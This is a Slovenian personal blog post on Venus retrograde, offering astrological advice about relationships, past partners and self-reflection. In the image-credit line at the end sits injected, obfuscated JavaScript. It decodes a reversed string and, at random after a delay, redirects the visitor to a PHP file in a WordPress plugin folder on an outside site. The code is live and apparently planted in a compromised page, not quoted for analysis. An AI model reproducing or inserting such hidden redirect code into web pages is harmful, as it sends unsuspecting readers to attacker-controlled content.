Venerin retrograd

Kljub temu, da sem pravočasno izvedela za Venerin retrograd, me je presenetil. Tako zelo, da mi je še zdaj slabo.

Venera je namreč planet ljubezni in boja in na našo (ne)srečo najprej potuje s škorpijonom, kar naredi njeno moč še bolj zakomplicirano in težko. Danes je njen dan. Danes je začetek njene navidezne poti nazaj, ki bo trajala celih štirideset dni in noči. V tem času lahko pričakujemo težje trenutke v ljubezni, saj njena moč in njena pot prav silita v introspekcijo. Za to uporabljata res težke situacije, ki pa so tukaj, da končno le odložimo morebitno prtljago iz prejšnih razmerij in prejšnih življenj.

Saj veste, tisti trenutki, ki jim še vedno ne priznamo prave vrednosti. Katere še vedno vidimo v olepšani luči in se še nismo naučili lekcije. Tisti trenutki se bodo zdaj ponovili. Poleg tega pa je znano, da v teh dneh “po nesreči” naletimo na prejšne partnerje. To nas lahko usmeri v razmišljanje o tem kako je bilo. Posledično lahko pozabimo na sedanjost. Pomaga, da na pretekla razmerja gledamo kritično, to nas bo usmerilo v spoznanje kaj lahko naredimo drugače, da bi bilo bolje v sedanjosti.

Venera se je v mojem razmerju pokazala že danes zjutraj, njen pridih pa je bilo čutiti že par dni nazaj. Kljub vsem opozorilom sem v ključnem trenutku pozabila nanjo in takrat je bilo že prepozno. Za mano je težek dan, v srcu nosim to težo in še kup preteklih napak, ki sem jih skozi življenje naredila. Prav sili me, da razmišljam o stvareh, katerih se tako izogibam, katerim tako zelo ne želim verjeti, katere bi pometla pod preprogo do smrti. Pa jih ne morem, ker postajajo vedno težje in zdaj je pravi trenutek, da jih začnem počasi in s trudom metati stran. Pa karkoli že naj bi to pomenilo. Nekaj je treba razrešit in težko bo, a na koncu vredno.

Za vse tiste, ki ste danes imeli slab dan, zdaj veste. Venera vas sooča z nujno potrebnimi spremembami. Vzemite si čas zase in dobro razmislite o vašem življenju. Kaj je v redu? Kaj je grozno? Česa ne prenašate in kaj lahko naredite? Bodite iskreni do sebe, kljub temu, da morda resnica boli. Vzemite si čas in nadaljujte to pot do svojega najboljšega možnega življenja.

Vso srečo.

Z Ljubeznijo;
(Ni)Si

Prikazana slika: $NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tos/pain?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText”>Unsplash

3 Comments